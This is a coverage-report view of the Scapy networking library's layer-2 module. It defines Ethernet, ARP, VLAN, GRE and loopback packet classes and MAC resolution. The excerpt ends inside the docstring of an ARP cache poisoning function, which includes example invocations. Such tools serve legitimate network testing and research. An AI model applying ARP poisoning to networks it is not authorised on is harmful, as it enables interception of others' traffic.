Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.8/site-packages/scapy/layers/l2.py: 47%
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
Shortcuts on this page
r m x toggle line displays
j k next/prev highlighted chunk
0 (zero) top of page
1 (one) first highlighted chunk
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Philippe Biondi <phil@secdev.org>
6"""
7Classes and functions for layer 2 protocols.
8"""
10import itertools
11import socket
12import struct
13import time
15from scapy.ansmachine import AnsweringMachine
16from scapy.arch import get_if_addr, get_if_hwaddr
17from scapy.base_classes import Gen, Net
18from scapy.compat import chb, orb
19from scapy.config import conf
20from scapy import consts
21from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \
22 DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \
23 DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC
24from scapy.error import warning, ScapyNoDstMacException, log_runtime
25from scapy.fields import (
26 BCDFloatField,
27 BitField,
28 ByteEnumField,
29 ByteField,
30 ConditionalField,
31 FCSField,
32 FieldLenField,
33 IP6Field,
34 IPField,
35 IntEnumField,
36 IntField,
37 LenField,
38 MACField,
39 MultipleTypeField,
40 OUIField,
41 ShortEnumField,
42 ShortField,
43 SourceIP6Field,
44 SourceIPField,
45 StrFixedLenField,
46 StrLenField,
47 ThreeBytesField,
48 XByteField,
49 XIntField,
50 XShortEnumField,
51 XShortField,
52)
53from scapy.interfaces import _GlobInterfaceType, resolve_iface
54from scapy.packet import bind_layers, Packet
55from scapy.plist import (
56 PacketList,
57 QueryAnswer,
58 SndRcvList,
59 _PacketList,
60)
61from scapy.sendrecv import sendp, srp, srp1, srploop
62from scapy.utils import checksum, hexdump, hexstr, inet_ntoa, inet_aton, \
63 mac2str, valid_mac, valid_net, valid_net6
65# Typing imports
66from typing import (
67 Any,
68 Callable,
69 Dict,
70 Iterable,
71 List,
72 Optional,
73 Tuple,
74 Type,
75 Union,
76 cast,
77)
78from scapy.interfaces import NetworkInterface
81if conf.route is None:
82 # unused import, only to initialize conf.route
83 import scapy.route # noqa: F401
86# type definitions
87_ResolverCallable = Callable[[Packet, Packet], Optional[str]]
89#################
90# Tools #
91#################
class Neighbor:
    """Registry of callables that resolve a layer-2 destination address.

    Resolvers are keyed by the ``(l2 class, l3 class)`` pair they handle.
    """

    def __init__(self):
        # type: () -> None
        self.resolvers = {}  # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable]  # noqa: E501

    def register_l3(self, l2, l3, resolve_method):
        # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None
        """Associate ``resolve_method`` with the ``(l2, l3)`` class pair."""
        self.resolvers[(l2, l3)] = resolve_method

    def resolve(self, l2inst, l3inst):
        # type: (Packet, Packet) -> Optional[str]
        """Call the resolver registered for the exact classes of both layers.

        Returns ``None`` when nothing is registered for that pair.
        """
        key = (l2inst.__class__, l3inst.__class__)
        try:
            resolver = self.resolvers[key]
        except KeyError:
            return None
        return resolver(l2inst, l3inst)

    def __repr__(self):
        # type: () -> str
        rows = []
        for lower, upper in self.resolvers:
            rows.append("%-15s -> %-15s" % (lower.__name__, upper.__name__))
        return "\n".join(rows)
# Shared resolver registry; DestMACField.i2m() queries it through
# conf.neighbor.resolve() when no destination MAC was given.
conf.neighbor = Neighbor()

# cache entries expire after 120s
_arp_cache = conf.netcache.new_cache("arp_cache", 120)
@conf.commands.register
def getmacbyip(ip, chainCC=0):
    # type: (str, int) -> Optional[str]
    """Return the MAC address used to reach a given IPv4 address.

    Multicast, loopback and broadcast destinations are answered without
    sending anything. Other addresses are looked up in the ARP cache and,
    failing that, resolved with a who-has request (addressed to the gateway
    when the route has one).

    :param ip: IPv4 address, or a Net whose first address is used
    :param chainCC: passed through to srp1()
    :returns: the MAC address, or None when resolution failed
    """
    if isinstance(ip, Net):
        ip = next(iter(ip))
    ip = inet_ntoa(inet_aton(ip or "0.0.0.0"))
    octets = [orb(b) for b in inet_aton(ip)]

    # 224.0.0.0/4: the MAC is derived from the low 23 bits of the address
    if (octets[0] & 0xf0) == 0xe0:  # mcast @
        return "01:00:5e:%.2x:%.2x:%.2x" % (
            octets[1] & 0x7f, octets[2], octets[3]
        )

    iff, _, gw = conf.route.route(ip)
    if iff == conf.loopback_name or ip in conf.route.get_if_bcast(iff):
        return "ff:ff:ff:ff:ff:ff"

    # Off-link destinations are reached through the gateway's MAC
    next_hop = ip if gw == "0.0.0.0" else gw

    cached = _arp_cache.get(next_hop)
    if cached:
        return cached

    request = Ether(dst=ETHER_BROADCAST) / ARP(op="who-has", pdst=next_hop)
    try:
        res = srp1(request,
                   type=ETH_P_ARP,
                   iface=iff,
                   timeout=2,
                   verbose=0,
                   chainCC=chainCC,
                   nofilter=1)
    except Exception as ex:
        warning("getmacbyip failed on %s", ex)
        return None
    if res is None:
        return None
    mac = res.payload.hwsrc
    _arp_cache[next_hop] = mac
    return mac
159# Fields
class DestMACField(MACField):
    """MAC field whose unset value is resolved from the payload on build."""

    def __init__(self, name):
        # type: (str) -> None
        super().__init__(name, None)

    def i2h(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> str
        unresolved = x is None and pkt is not None
        if unresolved:
            x = "None (resolved on build)"
        return super().i2h(pkt, x)

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> bytes
        if x is None and pkt is not None:
            try:
                x = conf.neighbor.resolve(pkt, pkt.payload)
            except socket.error:
                # Resolution failed; fall through to the no-MAC handling
                pass
            if x is None and conf.raise_no_dst_mac:
                raise ScapyNoDstMacException()
            if x is None:
                x = "ff:ff:ff:ff:ff:ff"
                warning(
                    "MAC address to reach destination not found. Using broadcast."
                )
        return super().i2m(pkt, x)
class SourceMACField(MACField):
    """MAC field defaulting to the hardware address of the outgoing interface."""
    __slots__ = ["getif"]

    def __init__(self, name, getif=None):
        # type: (str, Optional[Any]) -> None
        super().__init__(name, None)
        if getif is None:
            # Default: first element of the packet's route() result
            self.getif = lambda pkt: pkt.route()[0]
        else:
            self.getif = getif

    def i2h(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> str
        if x is not None:
            return super().i2h(pkt, x)
        iff = self.getif(pkt)
        if iff is None:
            iff = conf.iface
        if iff:
            x = resolve_iface(iff).mac
        if x is None:
            x = "00:00:00:00:00:00"
        return super().i2h(pkt, x)

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Optional[Any]) -> bytes
        human = self.i2h(pkt, x)
        return super().i2m(pkt, human)
215# Layers
# Display names for the numeric "hwtype" field of ARP (see ARP.fields_desc).
HARDWARE_TYPES = {
    1: "Ethernet (10Mb)",
    2: "Ethernet (3Mb)",
    3: "AX.25",
    4: "Proteon ProNET Token Ring",
    5: "Chaos",
    6: "IEEE 802 Networks",
    7: "ARCNET",
    8: "Hyperchannel",
    9: "Lanstar",
    10: "Autonet Short Address",
    11: "LocalTalk",
    12: "LocalNet",
    13: "Ultra link",
    14: "SMDS",
    15: "Frame relay",
    16: "ATM",
    17: "HDLC",
    18: "Fibre Channel",
    19: "ATM",
    20: "Serial Line",
    21: "ATM",
}

# Add names for the ethertypes handled by Dot1AD, Dot1AH and MACsec to the
# shared ETHER_TYPES table.
ETHER_TYPES[0x88a8] = '802_1AD'
ETHER_TYPES[0x88e7] = '802_1AH'
ETHER_TYPES[ETH_P_MACSEC] = '802_1AE'
class Ether(Packet):
    """Ethernet II frame header (destination, source, ethertype)."""
    __slots__ = ["_defrag_pos"]
    name = "Ethernet"
    fields_desc = [
        DestMACField("dst"),
        SourceMACField("src"),
        XShortEnumField("type", 0x9000, ETHER_TYPES),
    ]

    def hashret(self):
        # type: () -> bytes
        own = struct.pack("H", self.type)
        return own + self.payload.hashret()

    def answers(self, other):
        # type: (Packet) -> int
        """An Ether frame answers another one with the same ethertype
        whose payload it answers."""
        if not isinstance(other, Ether) or self.type != other.type:
            return 0
        return self.payload.answers(other.payload)

    def mysummary(self):
        # type: () -> str
        return self.sprintf("%src% > %dst% (%type%)")

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[bytes], *Any, **Any) -> Type[Packet]
        """Dissect as Dot3 when bytes 12-13 hold a value <= 1500."""
        if not _pkt or len(_pkt) < 14:
            return cls
        (type_or_len,) = struct.unpack("!H", _pkt[12:14])
        return Dot3 if type_or_len <= 1500 else cls
class Dot3(Packet):
    """IEEE 802.3 frame header (destination, source, length)."""
    name = "802.3"
    fields_desc = [
        DestMACField("dst"),
        SourceMACField("src"),
        LenField("len", None, "H"),
    ]

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, bytes]
        # The first `len` bytes are payload, the remainder is padding
        cut = self.len
        return s[:cut], s[cut:]

    def answers(self, other):
        # type: (Packet) -> int
        if not isinstance(other, Dot3):
            return 0
        return self.payload.answers(other.payload)

    def mysummary(self):
        # type: () -> str
        return "802.3 %s > %s" % (self.src, self.dst)

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[Any], *Any, **Any) -> Type[Packet]
        """Dissect as Ether when bytes 12-13 hold a value above 1500."""
        if not _pkt or len(_pkt) < 14:
            return cls
        (type_or_len,) = struct.unpack("!H", _pkt[12:14])
        return Ether if type_or_len > 1500 else cls
class LLC(Packet):
    # Three one-byte fields: DSAP, SSAP and control
    name = "LLC"
    fields_desc = [
        XByteField("dsap", 0x00),
        XByteField("ssap", 0x00),
        ByteField("ctrl", 0),
    ]
def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]:
    """
    Resolve the default L2 destination address by asking the registry
    again with the payload of ``l3`` in place of ``l3`` itself.
    """
    inner = l3.payload
    return conf.neighbor.resolve(l2, inner)


# LLC carries no address itself: look one layer further up
for _lower in (Ether, Dot3):
    conf.neighbor.register_l3(_lower, LLC, l2_register_l3)
del _lower
# Display names for the "pkttype" field of CookedLinux / CookedLinuxV2.
COOKED_LINUX_PACKET_TYPES = {
    0: "unicast",
    1: "broadcast",
    2: "multicast",
    3: "unicast-to-another-host",
    4: "sent-by-us"
}
class CookedLinux(Packet):
    # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html
    name = "cooked linux"
    # from wireshark's database
    fields_desc = [
        ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
        XShortField("lladdrtype", 512),
        ShortField("lladdrlen", 0),
        StrFixedLenField("src", b"", 8),
        # Upper-layer protocol, named through ETHER_TYPES
        XShortEnumField("proto", 0x800, ETHER_TYPES),
    ]
class CookedLinuxV2(CookedLinux):
    # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html
    name = "cooked linux v2"
    # Same information as CookedLinux plus "reserved" and "ifindex",
    # with the protocol placed first.
    fields_desc = [
        XShortEnumField("proto", 0x800, ETHER_TYPES),
        ShortField("reserved", 0),
        IntField("ifindex", 0),
        XShortField("lladdrtype", 512),
        ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
        ByteField("lladdrlen", 0),
        StrFixedLenField("src", b"", 8),
    ]
class MPacketPreamble(Packet):
    # IEEE 802.3br Figure 99-3
    name = "MPacket Preamble"
    fields_desc = [
        StrFixedLenField("preamble", b"", length=8),
        FCSField("fcs", 0, fmt="!I"),
    ]
class SNAP(Packet):
    # OUI followed by a 16-bit code named through ETHER_TYPES
    name = "SNAP"
    fields_desc = [
        OUIField("OUI", 0x000000),
        XShortEnumField("code", 0x000, ETHER_TYPES),
    ]


# SNAP carries no address: Dot3 destination resolution looks at its payload
conf.neighbor.register_l3(Dot3, SNAP, l2_register_l3)
class Dot1Q(Packet):
    """802.1Q VLAN tag: priority, DEI, VLAN id and inner type/length."""
    name = "802.1Q"
    aliastypes = [Ether]
    fields_desc = [
        BitField("prio", 0, 3),
        BitField("dei", 0, 1),
        BitField("vlan", 1, 12),
        XShortEnumField("type", 0x0000, ETHER_TYPES),
    ]
    deprecated_fields = {
        "id": ("dei", "2.5.0"),
    }

    def answers(self, other):
        # type: (Packet) -> int
        if not isinstance(other, Dot1Q):
            # The query was untagged: compare our payload with it directly
            return self.payload.answers(other)
        same_tag = self.type == other.type and self.vlan == other.vlan
        if same_tag:
            return self.payload.answers(other.payload)
        return 0

    def default_payload_class(self, pay):
        # type: (bytes) -> Type[Packet]
        # Values up to 1500 are treated as a length, so the payload is LLC
        return LLC if self.type <= 1500 else conf.raw_layer

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, Optional[bytes]]
        if self.type > 1500:
            return s, None
        length = self.type
        return s[:length], s[length:]

    def mysummary(self):
        # type: () -> str
        under = self.underlayer
        if not isinstance(under, Ether):
            return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")
        return under.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%")  # noqa: E501


conf.neighbor.register_l3(Ether, Dot1Q, l2_register_l3)
class STP(Packet):
    name = "Spanning Tree Protocol"
    fields_desc = [
        ShortField("proto", 0),
        ByteField("version", 0),
        ByteField("bpdutype", 0),
        ByteField("bpduflags", 0),
        # Root bridge: id, MAC and path cost
        ShortField("rootid", 0),
        MACField("rootmac", ETHER_ANY),
        IntField("pathcost", 0),
        # Sending bridge: id, MAC and port
        ShortField("bridgeid", 0),
        MACField("bridgemac", ETHER_ANY),
        ShortField("portid", 0),
        # Timers
        BCDFloatField("age", 1),
        BCDFloatField("maxage", 20),
        BCDFloatField("hellotime", 2),
        BCDFloatField("fwddelay", 15),
    ]
class ARP(Packet):
    # ARP header. The four address fields are MultipleTypeFields: each picks
    # a typed field (MAC / IPv4 / IPv6) from hwtype/ptype and hwlen/plen, and
    # otherwise falls back to a raw string sized by hwlen or plen.
    name = "ARP"
    fields_desc = [
        XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES),
        XShortEnumField("ptype", 0x0800, ETHER_TYPES),
        # Length bytes are declared as the lengths of hwsrc and psrc
        FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"),
        FieldLenField("plen", None, fmt="B", length_of="psrc"),
        # NOTE(review): "Dyn-RAR-rep" looks like a typo of "Dyn-RARP-rep";
        # it is a runtime key, so it is left untouched here.
        ShortEnumField("op", 1, {
            "who-has": 1,
            "is-at": 2,
            "RARP-req": 3,
            "RARP-rep": 4,
            "Dyn-RARP-req": 5,
            "Dyn-RAR-rep": 6,
            "Dyn-RARP-err": 7,
            "InARP-req": 8,
            "InARP-rep": 9
        }),
        # Each candidate is (field, (predicate(pkt), predicate(pkt, val))).
        # The second predicate also accepts an unset length (None) when the
        # value is None or looks like an address of the expected kind.
        MultipleTypeField(
            [
                (SourceMACField("hwsrc"),
                 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
                  lambda pkt, val: pkt.hwtype == 1 and (
                      pkt.hwlen == 6 or (pkt.hwlen is None and
                                         (val is None or len(val) == 6 or
                                          valid_mac(val)))
                  ))),
            ],
            StrFixedLenField("hwsrc", None, length_from=lambda pkt: pkt.hwlen),
        ),
        MultipleTypeField(
            [
                (SourceIPField("psrc", "pdst"),
                 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
                  lambda pkt, val: pkt.ptype == 0x0800 and (
                      pkt.plen == 4 or (pkt.plen is None and
                                        (val is None or valid_net(val)))
                  ))),
                (SourceIP6Field("psrc", "pdst"),
                 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
                  lambda pkt, val: pkt.ptype == 0x86dd and (
                      pkt.plen == 16 or (pkt.plen is None and
                                         (val is None or valid_net6(val)))
                  ))),
            ],
            StrFixedLenField("psrc", None, length_from=lambda pkt: pkt.plen),
        ),
        MultipleTypeField(
            [
                (MACField("hwdst", ETHER_ANY),
                 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
                  lambda pkt, val: pkt.hwtype == 1 and (
                      pkt.hwlen == 6 or (pkt.hwlen is None and
                                         (val is None or len(val) == 6 or
                                          valid_mac(val)))
                  ))),
            ],
            StrFixedLenField("hwdst", None, length_from=lambda pkt: pkt.hwlen),
        ),
        MultipleTypeField(
            [
                (IPField("pdst", "0.0.0.0"),
                 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
                  lambda pkt, val: pkt.ptype == 0x0800 and (
                      pkt.plen == 4 or (pkt.plen is None and
                                        (val is None or valid_net(val)))
                  ))),
                (IP6Field("pdst", "::"),
                 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
                  lambda pkt, val: pkt.ptype == 0x86dd and (
                      pkt.plen == 16 or (pkt.plen is None and
                                         (val is None or valid_net6(val)))
                  ))),
            ],
            StrFixedLenField("pdst", None, length_from=lambda pkt: pkt.plen),
        ),
    ]

    def hashret(self):
        # type: () -> bytes
        # (op + 1) // 2 gives the same value for an op and its successor
        # (1 and 2 -> 1, 3 and 4 -> 2, ...), i.e. for the op pairs that
        # answers() matches.
        return struct.pack(">HHH", self.hwtype, self.ptype,
                           ((self.op + 1) // 2)) + self.payload.hashret()

    def answers(self, other):
        # type: (Packet) -> int
        """Tell whether this ARP packet is a reply to ``other``.

        The reply op must be the query op plus one, and our psrc must match
        the query's pdst over the length of the shorter of the two.
        """
        if not isinstance(other, ARP):
            return False
        if self.op != other.op + 1:
            return False
        # We use a loose comparison on psrc vs pdst to catch answers
        # with ARP leaks
        self_psrc = self.get_field('psrc').i2m(self, self.psrc)  # type: bytes
        other_pdst = other.get_field('pdst').i2m(other, other.pdst) \
            # type: bytes
        return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)]

    def route(self):
        # type: () -> Tuple[Optional[str], Optional[str], Optional[str]]
        """Route towards pdst using conf.route6 or conf.route, depending on
        which concrete field type pdst resolved to.

        Returns ``(None, None, None)`` when pdst is neither IPv4 nor IPv6.
        """
        fld, dst = cast(Tuple[MultipleTypeField, str],
                        self.getfield_and_val("pdst"))
        fld_inner, dst = fld._find_fld_pkt_val(self, dst)
        if isinstance(dst, Gen):
            # Only the first generated value is used for routing
            dst = next(iter(dst))
        if isinstance(fld_inner, IP6Field):
            return conf.route6.route(dst)
        elif isinstance(fld_inner, IPField):
            return conf.route.route(dst)
        else:
            return None, None, None

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, bytes]
        # No payload: everything after the ARP fields is padding
        return b"", s

    def mysummary(self):
        # type: () -> str
        if self.op == 1:
            return self.sprintf("ARP who has %pdst% says %psrc%")
        if self.op == 2:
            return self.sprintf("ARP is at %hwsrc% says %psrc%")
        return self.sprintf("ARP %op% %psrc% > %pdst%")
def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]:
    """
    Resolves the default L2 destination address when ARP is used.

    :param l2: the layer 2 packet being built (unused here)
    :param l3: the ARP layer
    :returns: broadcast for who-has, the resolved MAC of ``pdst`` for is-at,
        or None when the address cannot be determined
    """
    if l3.op == 1:  # who-has
        return "ff:ff:ff:ff:ff:ff"
    elif l3.op == 2:  # is-at
        log_runtime.warning(
            "You should be providing the Ethernet destination MAC address when "
            "sending an is-at ARP."
        )
        # Need to resolve the target (ARP request) to send an ARP reply...
        plen = l3.get_field("pdst").i2len(l3, l3.pdst)
        if plen == 4:
            return getmacbyip(l3.pdst)
        elif plen == 16:
            # IPv6 addresses are 16 bytes long, matching the plen == 16
            # condition used by the ARP fields for ptype 0x86dd.
            from scapy.layers.inet6 import getmacbyip6
            return getmacbyip6(l3.pdst)
    # Can't even do that
    log_runtime.warning(
        "You should be providing the Ethernet destination mac when sending this "
        "kind of ARP packets."
    )
    return None


conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp)
class GRErouting(Packet):
    name = "GRE routing information"
    fields_desc = [
        ShortField("address_family", 0),
        ByteField("SRE_offset", 0),
        # One-byte length of routing_info
        FieldLenField("SRE_len", None, "routing_info", "B"),
        StrLenField(
            "routing_info",
            b"",
            length_from=lambda pkt: pkt.SRE_len,
        ),
    ]
class GRE(Packet):
    """GRE header with optional checksum/offset, key and sequence number."""
    name = "GRE"
    deprecated_fields = {
        "seqence_number": ("sequence_number", "2.4.4"),
    }
    fields_desc = [BitField("chksum_present", 0, 1),
                   BitField("routing_present", 0, 1),
                   BitField("key_present", 0, 1),
                   BitField("seqnum_present", 0, 1),
                   BitField("strict_route_source", 0, 1),
                   BitField("recursion_control", 0, 3),
                   BitField("flags", 0, 5),
                   BitField("version", 0, 3),
                   XShortEnumField("proto", 0x0000, ETHER_TYPES),
                   # chksum and offset are present together, whenever either
                   # the checksum or the routing bit is set
                   ConditionalField(XShortField("chksum", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1),  # noqa: E501
                   ConditionalField(XShortField("offset", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1),  # noqa: E501
                   ConditionalField(XIntField("key", None), lambda pkt:pkt.key_present == 1),  # noqa: E501
                   ConditionalField(XIntField("sequence_number", None), lambda pkt:pkt.seqnum_present == 1),  # noqa: E501
                   ]

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[Any], *Any, **Any) -> Type[Packet]
        """Dissect as GRE_PPTP when the protocol field is 0x880b.

        Input shorter than 4 bytes cannot hold the protocol field; it is
        left to this class instead of letting struct.unpack raise.
        """
        if _pkt and len(_pkt) >= 4:
            if struct.unpack("!H", _pkt[2:4])[0] == 0x880b:
                return GRE_PPTP
        return cls

    def post_build(self, p, pay):
        # type: (bytes, bytes) -> bytes
        """Append the payload and fill in the checksum when it was left unset."""
        p += pay
        if self.chksum_present and self.chksum is None:
            c = checksum(p)
            # The checksum occupies bytes 4-5, right after flags and proto
            p = p[:4] + chb((c >> 8) & 0xff) + chb(c & 0xff) + p[6:]
        return p
class GRE_PPTP(GRE):

    """
    Enhanced GRE header used with PPTP
    RFC 2637
    """

    name = "GRE PPTP"
    deprecated_fields = {
        "seqence_number": ("sequence_number", "2.4.4"),
    }
    fields_desc = [
        BitField("chksum_present", 0, 1),
        BitField("routing_present", 0, 1),
        BitField("key_present", 1, 1),
        BitField("seqnum_present", 0, 1),
        BitField("strict_route_source", 0, 1),
        BitField("recursion_control", 0, 3),
        BitField("acknum_present", 0, 1),
        BitField("flags", 0, 4),
        BitField("version", 1, 3),
        XShortEnumField("proto", 0x880b, ETHER_TYPES),
        ShortField("payload_len", None),
        ShortField("call_id", None),
        ConditionalField(XIntField("sequence_number", None), lambda pkt: pkt.seqnum_present == 1),  # noqa: E501
        ConditionalField(XIntField("ack_number", None), lambda pkt: pkt.acknum_present == 1),  # noqa: E501
    ]

    def post_build(self, p, pay):
        # type: (bytes, bytes) -> bytes
        """Append the payload; fill payload_len (bytes 4-5) when unset."""
        p += pay
        if self.payload_len is not None:
            return p
        size = len(pay)
        high = chb((size >> 8) & 0xff)
        low = chb(size & 0xff)
        return p[:4] + high + low + p[6:]
669# *BSD loopback layer
class LoIntEnumField(IntEnumField):
    """IntEnumField whose value is stored in the top byte of the integer."""

    def m2i(self, pkt, x):
        # type: (Optional[Packet], int) -> int
        internal = x >> 24
        return internal

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Union[List[int], int, None]) -> int
        machine = cast(int, x) << 24
        return machine
682# https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c
683# https://www.wireshark.org/docs/wsar_html/epan/aftypes_8h.html
# Display names for the "type" field of Loopback / LoopbackOpenBSD.
# Three different values (0x18, 0x1c, 0x1e) are all labelled IPv6.
LOOPBACK_TYPES = {0x2: "IPv4",
                  0x7: "OSI",
                  0x10: "Appletalk",
                  0x17: "Netware IPX/SPX",
                  0x18: "IPv6", 0x1c: "IPv6", 0x1e: "IPv6"}
691# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available.
692# This is to be compatible with both tcpdump and tshark
class Loopback(Packet):
    r"""
    \*BSD loopback layer
    """
    name = "Loopback"
    __slots__ = ["_defrag_pos"]
    # OpenBSD uses the plain integer field; elsewhere the shifted variant
    fields_desc = [
        (IntEnumField if consts.OPENBSD else LoIntEnumField)(
            "type", 0x2, LOOPBACK_TYPES
        )
    ]
if not consts.OPENBSD:
    class LoopbackOpenBSD(Loopback):
        # Loopback variant that always uses the plain IntEnumField
        name = "OpenBSD Loopback"
        fields_desc = [
            IntEnumField("type", 0x2, LOOPBACK_TYPES),
        ]
else:
    # On OpenBSD, Loopback already has this layout
    LoopbackOpenBSD = Loopback
class Dot1AD(Dot1Q):
    # Same fields and behaviour as Dot1Q; only the name differs. It is bound
    # to ethertype 0x88a8 in the bind_layers() table of this module.
    name = '802_1AD'
class Dot1AH(Packet):
    """802.1ah tag: priority, DEI, NCA, reserved bits and a 24-bit I-SID."""
    name = "802_1AH"
    fields_desc = [BitField("prio", 0, 3),
                   BitField("dei", 0, 1),
                   BitField("nca", 0, 1),
                   BitField("res1", 0, 1),
                   BitField("res2", 0, 2),
                   ThreeBytesField("isid", 0)]

    def answers(self, other):
        # type: (Packet) -> int
        """A Dot1AH answers another Dot1AH carrying the same I-SID whose
        payload it answers."""
        if isinstance(other, Dot1AH):
            if self.isid == other.isid:
                return self.payload.answers(other.payload)
        return 0

    def mysummary(self):
        # type: () -> str
        # The closing parenthesis was missing from the summary string
        return self.sprintf("802.1ah (isid=%Dot1AH.isid%)")


conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3)
# Layer bindings. The keyword of each binding must be a field of the LOWER
# layer: "type" for Ether/Dot1Q/Dot1AD, "proto" for CookedLinux/GRE and
# "code" for SNAP. A keyword naming a field the lower layer does not have
# can never match.
bind_layers(Dot3, LLC)
bind_layers(Ether, LLC, type=122)
bind_layers(Ether, LLC, type=34928)
bind_layers(Ether, Dot1Q, type=33024)
bind_layers(Ether, Dot1AD, type=0x88a8)
bind_layers(Ether, Dot1AH, type=0x88e7)
bind_layers(Dot1AD, Dot1AD, type=0x88a8)
bind_layers(Dot1AD, Dot1Q, type=0x8100)
bind_layers(Dot1AD, Dot1AH, type=0x88e7)
bind_layers(Dot1Q, Dot1AD, type=0x88a8)
bind_layers(Dot1Q, Dot1AH, type=0x88e7)
bind_layers(Dot1AH, Ether)
bind_layers(Ether, Ether, type=1)
bind_layers(Ether, ARP, type=2054)
bind_layers(CookedLinux, LLC, proto=122)
bind_layers(CookedLinux, Dot1Q, proto=33024)
bind_layers(CookedLinux, Dot1AD, proto=0x88a8)
bind_layers(CookedLinux, Dot1AH, proto=0x88e7)
bind_layers(CookedLinux, Ether, proto=1)
bind_layers(CookedLinux, ARP, proto=2054)
bind_layers(MPacketPreamble, Ether)
bind_layers(GRE, LLC, proto=122)
bind_layers(GRE, Dot1Q, proto=33024)
bind_layers(GRE, Dot1AD, proto=0x88a8)
bind_layers(GRE, Dot1AH, proto=0x88e7)
bind_layers(GRE, Ether, proto=0x6558)
bind_layers(GRE, ARP, proto=2054)
bind_layers(GRE, GRErouting, {"routing_present": 1})
bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0})
bind_layers(GRErouting, GRErouting)
bind_layers(LLC, STP, dsap=66, ssap=66, ctrl=3)
bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3)
bind_layers(SNAP, Dot1Q, code=33024)
bind_layers(SNAP, Dot1AD, code=0x88a8)
bind_layers(SNAP, Dot1AH, code=0x88e7)
bind_layers(SNAP, Ether, code=1)
bind_layers(SNAP, ARP, code=2054)
bind_layers(SNAP, STP, code=267)
# Link-type registrations. Three different calls are used below: register(),
# register_num2layer() and register_layer2num().
# NOTE(review): presumably register() maps both ways while the other two map
# one direction only — confirm against the conf.l2types implementation.
conf.l2types.register(ARPHDR_ETHER, Ether)
conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether)
conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether)
conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3)
conf.l2types.register(DLT_LINUX_SLL, CookedLinux)
conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2)
conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble)
conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux)
conf.l2types.register(DLT_NULL, Loopback)
conf.l2types.register(DLT_LOOP, LoopbackOpenBSD)

conf.l3types.register(ETH_P_ARP, ARP)
795# Techniques
@conf.commands.register
def arpcachepoison(
    target,  # type: Union[str, List[str]]
    addresses,  # type: Union[str, Tuple[str, str], List[Tuple[str, str]]]
    broadcast=False,  # type: bool
    count=None,  # type: Optional[int]
    interval=15,  # type: int
    **kwargs,  # type: Any
):
    # type: (...) -> None
    """Poison targets' ARP cache

    :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs
                   or the subnet that will be poisoned.
    :param addresses: Can be either a string, a tuple or a list of tuples.
                      If it's a string, it's the IP to advertise to the victim,
                      with the local interface's MAC. If it's a tuple,
                      it's ("IP", "MAC"). If it's a list, it's [("IP", "MAC")].
                      "IP" can be a subnet of course.
    :param broadcast: Use broadcast ethernet
    :param count: number of times the packets are sent. When None, they are
                  sent until interrupted with Ctrl-C.
    :param interval: delay in seconds, passed to sendp() as ``inter`` when
                     count is set, slept between rounds otherwise
    :param kwargs: forwarded to sendp()

    Examples for target "192.168.0.2"::

        >>> arpcachepoison("192.168.0.2", "192.168.0.1")
        >>> arpcachepoison("192.168.0.1/24", "192.168.0.1")
        >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1")
